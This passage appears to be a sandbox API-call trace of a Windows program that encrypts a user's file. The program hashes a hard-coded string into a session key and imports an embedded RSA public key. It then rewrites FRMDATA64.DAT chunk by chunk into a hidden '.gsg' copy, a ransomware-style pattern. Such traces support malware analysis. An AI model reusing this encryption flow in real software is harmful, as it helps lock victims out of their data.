lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0266.495] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0266.495] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0266.495] GetLastError () returned 0x0 [0266.495] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\FORMS\\FRMDATA64.DAT" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\forms\\frmdata64.dat")) returned 0x20 [0266.496] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\FORMS\\FRMDATA64.DAT", dwFileAttributes=0x80) returned 1 [0266.496] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\FORMS\\FRMDATA64.DAT" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\forms\\frmdata64.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0266.497] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\FORMS\\FRMDATA64.DAT.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\forms\\frmdata64.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0266.498] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\FORMS\\FRMDATA64.DAT.gsg", dwFileAttributes=0x2) returned 1 [0266.499] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2e7a500) returned 1 [0266.501] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0266.501] lstrlenA (lpString="PvMwiXwJkKzPixDiGqwlDZbNzMlQm") returned 29 [0266.501] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0266.501] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2e7eb80) returned 1 [0266.501] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0266.501] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0266.501] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2e77d28) returned 1 [0266.502] CryptImportPublicKeyInfo (in: hCryptProv=0x2e77d28, dwCertEncodingType=0x1, pInfo=0x2eb0f70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb0fa0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb0fa8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2e7f180) returned 1 [0266.502] CryptEncrypt (in: hKey=0x2e7f180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0266.502] CryptEncrypt (in: hKey=0x2e7f180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e78300*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2e78300*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0266.502] WriteFile (in: hFile=0x5d44, lpBuffer=0x2e78300*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x2e78300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x80, lpOverlapped=0x0) returned 1 [0266.503] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.613] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.613] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.650] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.650] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.650] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.650] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.650] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.650] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.650] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.650] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.650] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.651] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.778] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.778] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.778] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.779] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.779] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.779] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.779] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.779] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.779] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.779] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.779] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.779] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.779] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.779] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.779] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.779] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.779] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.779] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.779] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.780] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.780] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.780] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.780] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.780] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.780] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.780] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.780] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.780] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.780] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.780] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.781] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.781] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.781] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.781] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.781] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.781] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.781] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.781] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.781] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.781] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.781] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.781] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.781] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.781] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.781] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.782] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.782] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.782] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.782] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.782] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.782] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.782] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.782] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.782] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.782] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.782] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.782] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.782] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.782] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.783] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.783] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.783] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.783] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.783] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.783] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.783] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.783] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.783] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.783] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.783] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, 